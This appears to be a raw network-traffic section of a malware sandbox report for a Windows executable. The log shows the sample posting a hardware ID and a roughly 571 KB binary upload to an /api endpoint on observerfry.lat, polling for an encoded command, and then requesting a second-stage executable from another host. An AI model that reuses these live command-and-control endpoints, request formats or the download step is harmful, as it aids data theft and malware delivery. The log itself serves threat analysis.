                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=ss64ui103aqmq6otnhuptvpfbl; expires=Fri, 18 Apr 2025 00:50:59 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tt66JHmDewnXT1R1qG2QHMnbOiFUVJsaidFj07TTGBI13jQ3OZRvrL%2B9a9xPBwzDUToiwpkBd5Hq%2F%2FTXuXDMNuNi1EZ6qhbyplxC3nU%2FkOX%2FLUllu6nvS9U4Qz6ywlOt5L8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8f667f33b8488c8f-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1996&min_rtt=1995&rtt_var=751&sent=15&recv=26&lost=0&retrans=0&sent_bytes=2837&recv_bytes=21389&delivery_rate=1453459&cwnd=209&unsent_bytes=0&cid=71adc31d16456469&ts=1028&x=0"
                                                                                                                                                                    2024-12-23 07:04:20 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                                                                    2024-12-23 07:04:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    5192.168.2.1049732104.21.36.2014437200C:\Users\user\Desktop\Yh6fS6qfTE.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-23 07:04:22 UTC270OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: multipart/form-data; boundary=NREVLCRG
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 1211
                                                                                                                                                                    Host: observerfry.lat
                                                                                                                                                                    2024-12-23 07:04:22 UTC1211OUTData Raw: 2d 2d 4e 52 45 56 4c 43 52 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 37 45 30 38 30 44 36 38 37 45 36 43 31 39 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4e 52 45 56 4c 43 52 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4e 52 45 56 4c 43 52 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4e 52 45 56 4c 43 52 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                                                                                                    Data Ascii: --NREVLCRGContent-Disposition: form-data; name="hwid"B67E080D687E6C19AC8923850305D13E--NREVLCRGContent-Disposition: form-data; name="pid"1--NREVLCRGContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--NREVLCRGContent-Di
                                                                                                                                                                    2024-12-23 07:04:23 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Mon, 23 Dec 2024 07:04:23 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=rlmsk336o1hbvsv5rsrc9fvp4b; expires=Fri, 18 Apr 2025 00:51:02 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qo3Jtd8dWMHJPTt0Jd7p2Vd%2Fg8KMcnXBPxTEAm1%2FAoXt%2FutfSMJ0iG7wSdpfJneXqkb37rTnsqR4Yxfjvx1PAtDdKA4Y9WaGz%2FQ%2F8xUq0KJBszqNxPjZdzCdXZhsTol2u%2B0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8f667f46f88a42df-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1720&min_rtt=1709&rtt_var=663&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2117&delivery_rate=1624930&cwnd=237&unsent_bytes=0&cid=ab89e9ca96cda90a&ts=797&x=0"
                                                                                                                                                                    2024-12-23 07:04:23 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                                                                    2024-12-23 07:04:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    6192.168.2.1049740104.21.36.2014437200C:\Users\user\Desktop\Yh6fS6qfTE.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-23 07:04:25 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: multipart/form-data; boundary=7U9NNJRY0XWPO12
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 571438
                                                                                                                                                                    Host: observerfry.lat
                                                                                                                                                                    2024-12-23 07:04:25 UTC15331OUTData Raw: 2d 2d 37 55 39 4e 4e 4a 52 59 30 58 57 50 4f 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 37 45 30 38 30 44 36 38 37 45 36 43 31 39 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 37 55 39 4e 4e 4a 52 59 30 58 57 50 4f 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 55 39 4e 4e 4a 52 59 30 58 57 50 4f 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d
                                                                                                                                                                    Data Ascii: --7U9NNJRY0XWPO12Content-Disposition: form-data; name="hwid"B67E080D687E6C19AC8923850305D13E--7U9NNJRY0XWPO12Content-Disposition: form-data; name="pid"1--7U9NNJRY0XWPO12Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
                                                                                                                                                                    2024-12-23 07:04:25 UTC15331OUTData Raw: be 7e c7 ce f7 ac 2a 16 4e 50 f8 f0 fb 64 95 29 94 50 11 ed 69 07 6a 42 bc 53 1d 93 27 40 a9 40 0e e2 c1 95 e4 9a 32 45 40 a8 f2 1b 99 63 7c 6b 7d a6 c1 bb 9b f3 8f b4 d9 49 2f 28 a3 62 6f e8 d1 5f 8c ce fb 9f 20 7a 6e a1 92 67 a7 72 9a 20 1a 76 ba 75 de 64 6e 7b 7d 6e 78 ed 57 b2 2f 0e 68 16 13 00 bb 5b ca 63 4f 1c 0a 51 18 da 27 bd 26 60 bf 1b 0a 2e 84 3e 13 cd a0 bf 31 39 f5 23 f6 a3 e0 3d eb e0 4f 5d 08 78 1f 37 94 01 85 40 ec dd 4c 86 ef 0f 1e d0 ec fb bf fd 49 ff 87 81 f9 01 df c6 7e 78 01 c0 aa b8 b6 75 3e 30 54 0c 51 b8 54 12 8a 3a c9 7a 43 72 9b 73 97 87 23 40 c8 9b fb f5 89 7a 54 c6 62 cd bf 26 b6 10 f5 80 18 e7 67 2c 9e a7 5b e7 62 41 54 c8 6a 64 ca 23 d9 cb b1 3e 63 e2 ee 2a 58 c4 a5 1d 5a 0b fc 63 41 d4 13 d3 2b cf 82 4f 1b 3b 50 cd 97 b1 92
                                                                                                                                                                    Data Ascii: ~*NPd)PijBS'@@2E@c|k}I/(bo_ zngr vudn{}nxW/h[cOQ'&`.>19#=O]x7@LI~xu>0TQT:zCrs#@zTb&g,[bATjd#>c*XZcA+O;P
                                                                                                                                                                    2024-12-23 07:04:25 UTC15331OUTData Raw: d5 ef 80 47 27 08 c7 40 e6 3e 95 5e ce a2 84 74 72 68 c0 a3 25 20 b8 82 1f 18 99 66 68 a3 1d 9e d8 a6 22 8d ca d3 9f c1 ee 32 bf 37 33 a8 24 f3 1e 5d 4a 58 05 9e e4 2e a4 8e 06 db 42 34 c3 00 ce ff b0 3f 14 b1 36 ab 05 1c 04 e8 0c f1 6f 7e 70 f1 01 42 34 43 97 13 03 c8 c3 f3 1c 7a 31 1c a2 65 48 c1 af 9a 6d 64 be 91 3a 7f 59 57 71 95 5e 67 01 12 4b 90 0b b5 4b 5a d2 d3 d0 92 47 87 4c 06 27 43 51 65 0a b8 f6 a6 37 4d 1c 89 1c 96 50 fc c3 54 0a 2e 93 4d fa fd d4 16 3b eb a1 10 8b 21 bd a3 bf f1 19 1e a8 4f 4a 20 bd 54 0d d3 e3 76 2c 2a b2 c9 dd da 98 85 76 f2 dc a4 03 eb 7e 5e 5b b8 87 8d 41 a4 03 48 5c 1c ab 7e fc e7 f9 0f 27 12 85 7a 84 bf 6e 2a 3c 06 b9 4d fc c4 c5 42 fe 14 1a 72 fd 62 37 76 4c 76 fc 53 44 a8 36 b2 4b 24 f0 28 e1 20 5c f2 b5 c6 bf 10 87
                                                                                                                                                                    Data Ascii: G'@>^trh% fh"273$]JX.B4?6o~pB4Cz1eHmd:YWq^gKKZGL'CQe7MPT.M;!OJ Tv,*v~^[AH\~'zn*<MBrb7vLvSD6K$( \
                                                                                                                                                                    2024-12-23 07:04:25 UTC15331OUTData Raw: f5 d1 c1 cb 51 21 c1 6f 2d 26 e8 f0 b5 63 46 c5 6b 12 da e0 fd 24 fb fb d7 23 cc 18 8c e6 03 dc 58 55 37 d4 74 10 9b 00 fd da be 88 11 46 86 7f ad be 70 6e 81 c0 db e3 bf 25 d4 74 21 46 61 e1 00 7e 77 af 12 ff 59 7a 56 ab 49 02 e4 7e bc d7 22 22 c0 82 c4 0f 94 3d cc 55 7b 4a d7 1b e8 72 8e e1 47 6d 0b 31 fb fb 31 5a 63 0d 15 6f d1 7b 79 41 57 49 96 ad f7 a1 6b 52 a3 52 07 04 e1 62 90 5a 7a 35 e5 3b dd 20 b0 1d 41 ac e0 99 5f d1 df 2f 19 7e 47 2b cb 59 08 c4 7f 67 8f e9 e3 33 d4 44 a5 7e 73 e2 61 f7 ef a2 d8 16 b0 4e b2 e3 9d c7 2c 4f fd f9 89 c0 f1 31 45 17 de 5d 6a 37 ab 9f 80 f0 6c b4 09 f1 43 17 64 a4 75 4c 72 c0 98 17 40 15 49 51 d1 c1 09 00 f7 46 86 7a 27 66 67 40 ed 12 fb 75 30 ca 96 94 7c e8 98 c7 ba 25 44 5a 28 fa 03 34 f5 d6 55 e3 9b ef eb ee 6a
                                                                                                                                                                    Data Ascii: Q!o-&cFk$#XU7tFpn%t!Fa~wYzVI~""=U{JrGm11Zco{yAWIkRRbZz5; A_/~G+Yg3D~saN,O1E]j7lCduLr@IQFz'fg@u0|%DZ(4Uj
                                                                                                                                                                    2024-12-23 07:04:25 UTC15331OUTData Raw: 42 8e 1a 8a 0e 1f 83 00 5f 5a b4 fe f7 7a 10 91 84 20 8a b9 e0 65 c3 bf 7f a8 ed d8 2b 4b a5 78 60 bb 37 ff 9f 35 f9 ff af 97 42 b8 73 94 67 1c 01 74 57 63 44 ae 20 31 e1 ef 84 dc f7 ed b9 08 5c 92 2d d9 8c d1 a9 14 57 3b 93 3e 71 70 96 24 89 a0 82 d0 a8 d0 17 87 11 44 4f 48 5d 19 a7 c8 7f 65 35 79 43 4f fb d6 97 b1 af f1 35 cd 45 a7 6f 67 09 0d e3 c0 59 aa 1d 17 30 5f 41 1e 76 f2 90 a1 aa 48 a8 06 ee c1 fb 23 85 a7 ae fb 69 00 47 cc 9f eb e3 3d 15 a8 4d b9 54 34 e8 d4 0f 37 1a eb a7 0c 7f 52 bd 87 54 aa 7d fe 4d 07 d2 96 77 40 01 1e 96 ff 82 42 b3 09 83 ed fa 3c 1f 0d 7f c3 9f ea f6 bf 8f e0 60 20 fa 5f c5 36 66 6b 3f b1 fa 9b 54 5c 6a f1 1e 7b c5 cc d2 cd 8b 92 98 24 32 94 51 81 0a 58 cf c8 bb 7a 8d f7 ed 03 63 cf d5 3d ed e6 f5 76 70 96 e9 1d 7b 96 6e
                                                                                                                                                                    Data Ascii: B_Zz e+Kx`75BsgtWcD 1\-W;>qp$DOH]e5yCO5EogY0_AvH#iG=MT47RT}Mw@B<` _6fk?T\j{$2QXzc=vp{n
                                                                                                                                                                    2024-12-23 07:04:25 UTC15331OUTData Raw: 21 d8 c9 5f 24 f6 b0 f1 3a 3c aa 3b 76 f4 f1 fd 5c 57 7a 3f 12 47 69 a8 0b f5 fc 16 13 0d 87 ce a6 5d e3 d1 d5 50 d6 e4 de 68 e6 a1 6a 29 69 fc a6 00 4a 23 eb 8b 82 0f 17 42 09 40 24 3f 6b 51 cf 67 32 53 09 e3 f1 fd c7 32 94 f6 07 5f bb 0b 0d 0e 54 94 6d 65 a6 84 d5 99 5b fb d1 2b ab 28 d6 cc 80 88 67 7f 91 6a e5 ec dd 55 6f 3b 4d 0c ac 02 5e 45 0a 76 9e 74 80 b7 81 a7 82 93 a5 d1 81 33 93 9d 39 b6 32 ec 11 df b9 b9 b7 39 e5 13 1f 53 b5 b1 06 e0 4c 3a f1 e2 ac a2 93 f0 01 5d ee cf bc d1 0a a1 f8 da 77 3f 43 54 43 c7 cc 59 9d 4b e6 ac 31 19 6e 95 59 fe 48 d8 ec 65 b9 e3 07 7d c3 f8 04 aa 2b a2 f7 5c 95 16 80 2a 4c 5b 1b 4e 66 2a 82 64 37 50 9c bf f7 c4 41 f0 be bf d8 05 0f ea 21 d4 6d 86 13 fb c5 0b 3e 99 08 be de c8 f5 14 79 34 fd 64 f8 d6 45 00 5e 8a d4
                                                                                                                                                                    Data Ascii: !_$:<;v\Wz?Gi]Phj)iJ#B@$?kQg2S2_Tme[+(gjUo;M^Evt3929SL:]w?CTCYK1nYHe}+\*L[Nf*d7PA!m>y4dE^
                                                                                                                                                                    2024-12-23 07:04:25 UTC15331OUTData Raw: 2e c3 fb 82 95 47 fe 3d 73 45 64 3f 2c c7 90 a3 ca db c1 62 c3 2a e3 f9 af 49 7e 1b 13 d2 34 85 ca 2f f9 84 21 c9 b1 9d 8c 2f f2 b3 37 6f 53 73 b7 ee 21 a3 ca f7 8d 34 8f d8 46 87 48 0b 76 e4 57 a6 6b f3 c0 ca 5c ca 04 ae 76 d5 89 b0 35 47 b9 8a 23 07 51 b4 b9 60 15 fc 27 1f 74 d9 77 b9 28 91 ad bc 11 29 d8 e8 fe ab 3a 12 d7 5f 52 c5 2d ab 7a e1 c3 5c 2b 1c 64 59 9f fa ab 2e df 00 28 59 01 6b f7 8d 11 81 53 96 e0 b7 13 07 86 98 be b3 55 73 97 fa c2 5a 8f 75 ea 81 1b f4 9a ca 24 7e 60 cf ad 7d d0 9a 2d a3 75 54 2f 70 c6 70 16 90 c6 d8 42 88 0e 3c c2 7a 12 24 0d 19 9e 93 85 5b 16 70 e0 90 ae 3b 44 fa 6d 47 ec 7a 3a 12 c3 5c 08 9f fe 4d 38 35 7c e6 27 49 83 e7 ae a6 40 d0 59 ef e6 77 07 34 cd f2 13 76 5c 5f 9b 58 9a 96 9c ff a9 23 fd 7b f6 86 c1 bb e6 f8 f4
                                                                                                                                                                    Data Ascii: .G=sEd?,b*I~4/!/7oSs!4FHvWk\v5G#Q`'tw():_R-z\+dY.(YkSUsZu$~`}-uT/ppB<z$[p;DmGz:\M85|'I@Yw4v\_X#{
                                                                                                                                                                    2024-12-23 07:04:25 UTC15331OUTData Raw: 07 d5 80 d4 f9 56 aa 26 cf ef 2f 14 ce 0f ca 83 c6 f6 c5 97 e2 95 b2 7f 2d 76 47 74 ed 48 1e d3 11 ae 2d 9c 7e a4 53 14 bc 10 6a fe 13 2b b9 7f e8 f7 b0 b3 cf da 37 1d 7b 1d 96 8c f2 0f 05 f5 b9 b3 f4 06 dc c6 cd 79 bd f7 48 48 dd 81 10 5b 91 e7 5d 43 a7 17 8f c4 45 de 18 da 31 d2 22 62 c1 8b 67 84 f1 e0 ee 9b 3a 1f 40 89 a4 59 6a 41 11 19 ca f5 32 db 0a de 2c 8c a7 86 ea 84 6c 48 e8 05 7e ec 83 60 3e c7 ac 7d 78 c2 9b 1e b9 a7 3c 38 18 8d ef 51 4f bf bd fe 4d 49 ff 0e 20 16 bb e7 b9 02 a7 47 4a fa 47 e8 15 27 01 05 86 d7 fe 32 a3 3a a3 91 a3 77 05 81 f8 c2 73 86 ab 19 28 92 47 1f 32 af f5 e1 07 5d ed d7 5e 78 3d 27 31 ba f8 10 31 77 ba 04 fa c8 0e 90 7f 13 7e 77 5c 60 6a 15 06 d2 a8 02 18 99 55 a6 ab 81 bc 05 3f db 33 d1 27 05 d0 af 47 6a a7 16 4a b4 6a
                                                                                                                                                                    Data Ascii: V&/-vGtH-~Sj+7{yHH[]CE1"bg:@YjA2,lH~`>}x<8QOMI GJG'2:ws(G2]^x='11w~w\`jU?3'GjJj
                                                                                                                                                                    2024-12-23 07:04:25 UTC15331OUTData Raw: da 32 db e0 67 78 e2 82 5f ae ca 3c fe 0d 7d 0a dd c8 36 a3 d7 e9 14 16 52 e7 2f 65 c7 fb ac 97 1d 20 a9 31 15 33 a2 21 1c df 44 2a 9e 44 6d 32 7f ad 82 b6 12 4b a3 10 88 c9 88 fd 00 8d 07 59 a2 04 04 7e a8 25 2c 03 1c c1 d3 07 1e d3 1d 40 a6 44 7f 85 7e d8 af 49 8f 45 4e 21 91 3d 0d 16 c4 99 8c 49 da 4e c3 0d dc 6c 60 93 2b 75 fd 5f 93 b0 2f 26 53 b8 ce 08 a7 5d fb 1a 0d 9e a7 14 3d ef 6c b0 f5 40 3d 00 59 f1 97 f7 32 df bf 7f 3e ec 38 ac 10 95 05 93 6f 76 50 bd 33 8d ec 16 cf 19 11 52 a6 63 23 d1 31 fe 5f 68 04 89 88 9e b4 c2 73 5e 2c ed 58 af 7b 08 f1 cf 69 23 16 66 37 bb f5 cf 67 06 09 4d e5 9b 29 fc 58 6c 1e 21 16 40 4b 7b 96 ec 80 ad 1e 09 6f 01 50 22 ff ee 00 27 12 52 6f 8e bd 72 4f a6 d8 bb 7f 90 c1 8f 85 4d ae ab a8 fe 62 bd 06 23 eb 3c d4 77 be
                                                                                                                                                                    Data Ascii: 2gx_<}6R/e 13!D*Dm2KY~%,@D~IEN!=INl`+u_/&S]=l@=Y2>8ovP3Rc#1_hs^,X{i#f7gM)Xl!@K{oP"'RorOMb#<w
                                                                                                                                                                    2024-12-23 07:04:25 UTC15331OUTData Raw: 29 1c ab f9 c2 d0 55 43 e3 f0 cf e5 b1 ec a7 be 1e 46 93 83 ae fa fa 6b 9f 9c 31 5f b0 a5 ce 70 b8 58 01 d7 92 a9 76 37 1a 13 ac 1d 95 6f 5a 0b 2b d5 03 55 8d 1c 03 63 7e 4b d2 da b4 71 f9 f7 5a fb b1 9e 1f e8 b2 0d d4 da 86 a1 33 03 30 3e 21 40 f8 d7 eb 28 14 37 95 0f d9 d7 a1 99 67 4b 95 3f c1 56 be 5e 0d 68 26 f3 f1 bc ec 27 38 13 85 42 01 56 4f 19 a0 fb 45 c1 a7 79 4a 6e 52 ff 8d 1d be 15 43 e9 84 80 e5 41 54 9a 27 f0 7e f6 6f 31 5b aa 83 d9 5c 59 19 10 f0 3c 1c d0 83 46 1d ae 72 2e 02 5a 1f e6 5a b7 30 cb 9f 07 f0 70 76 13 c8 61 6c 7d 88 15 1d 1c e1 5b fa 30 fe c8 b8 27 ef 7f 0d 70 84 59 fc 47 14 d3 fd 57 fd 73 8b 11 c1 25 e4 cc d2 48 cb 04 66 c7 ce 13 53 fc 26 11 75 f8 6d e1 ba bd e5 1a a5 2d bc 09 77 eb 7c 9d 78 df 24 8a ae be a4 3b df 68 a4 07 60
                                                                                                                                                                    Data Ascii: )UCFk1_pXv7oZ+Uc~KqZ30>!@(7gK?V^h&'8BVOEyJnRCAT'~o1[\Y<Fr.ZZ0pval}[0'pYGWs%HfS&um-w|x$;h`
                                                                                                                                                                    2024-12-23 07:04:29 UTC1137INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Mon, 23 Dec 2024 07:04:29 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=ns8leial53q4i19rlff1ivg4bc; expires=Fri, 18 Apr 2025 00:51:06 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2uvq6vhMjUZyw8PBzgFiedcVvfR%2BSyO6yN1w55kV8Tw8EM7uRi1ItVy%2Fmj3pxQEHcV%2FZE%2FRF0%2FTmBnQzYdJC8fyKfXmXRUjn7HaP86y%2BoxbSjIMFRShR3EYbK7SNuQH9onA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8f667f5858cf78d6-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2013&min_rtt=2006&rtt_var=767&sent=341&recv=593&lost=0&retrans=0&sent_bytes=2837&recv_bytes=573981&delivery_rate=1413359&cwnd=147&unsent_bytes=0&cid=142a48bbeb885cd7&ts=3914&x=0"


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    7192.168.2.1049752104.21.36.2014437200C:\Users\user\Desktop\Yh6fS6qfTE.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-23 07:04:30 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 88
                                                                                                                                                                    Host: observerfry.lat
                                                                                                                                                                    2024-12-23 07:04:30 UTC88OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 42 36 37 45 30 38 30 44 36 38 37 45 36 43 31 39 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                                                                    Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=B67E080D687E6C19AC8923850305D13E
                                                                                                                                                                    2024-12-23 07:04:31 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Mon, 23 Dec 2024 07:04:31 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=42lauiptl9ak8pp4id474lcclg; expires=Fri, 18 Apr 2025 00:51:10 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FA00Zb%2FDIGD6d3%2FQKWoBHJnNIRLL5FnSEUbWnSmTTZbDyVgIA7NotG%2FxoVIhG63YIrMMqNXF1qNjaVB5DLpUEX4GPInQ%2B3XU2jgR1AmcoqGHEVtZhD%2B4VbeO%2BGVZX7%2B3Py0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8f667f797c5fc407-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1694&min_rtt=1683&rtt_var=653&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=987&delivery_rate=1646926&cwnd=197&unsent_bytes=0&cid=5f914f5bf63f8183&ts=786&x=0"
                                                                                                                                                                    2024-12-23 07:04:31 UTC198INData Raw: 63 30 0d 0a 2f 7a 6a 6a 55 58 2f 77 69 4a 6a 48 47 4d 71 2b 41 57 45 70 6a 71 36 72 7a 34 67 57 6d 39 74 4c 59 70 78 47 57 6a 37 61 66 50 69 6b 51 38 45 6b 58 63 71 71 38 4c 4e 73 75 73 30 37 50 51 62 53 67 63 6d 6d 2f 48 54 75 75 43 41 48 36 47 67 31 54 4c 30 67 31 35 4a 42 6a 54 51 49 68 2b 66 71 72 47 75 36 33 32 49 45 47 4c 79 64 6d 50 36 36 53 72 53 6f 4b 41 7a 34 47 6e 56 61 74 51 75 57 6b 31 65 43 4e 51 79 73 70 39 36 6f 61 71 66 66 64 52 56 41 34 4d 6e 6f 70 2b 6c 6b 38 71 38 71 41 50 41 6a 64 46 75 69 47 64 72 54 47 6f 55 6c 58 63 71 34 74 4f 56 39 36 49 51 77 48 48 51 3d 0d 0a
                                                                                                                                                                    Data Ascii: c0/zjjUX/wiJjHGMq+AWEpjq6rz4gWm9tLYpxGWj7afPikQ8EkXcqq8LNsus07PQbSgcmm/HTuuCAH6Gg1TL0g15JBjTQIh+fqrGu632IEGLydmP66SrSoKAz4GnVatQuWk1eCNQysp96oaqffdRVA4Mnop+lk8q8qAPAjdFuiGdrTGoUlXcq4tOV96IQwHHQ=
                                                                                                                                                                    2024-12-23 07:04:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    8192.168.2.1049758185.166.143.504437200C:\Users\user\Desktop\Yh6fS6qfTE.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-23 07:04:32 UTC248OUTGET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
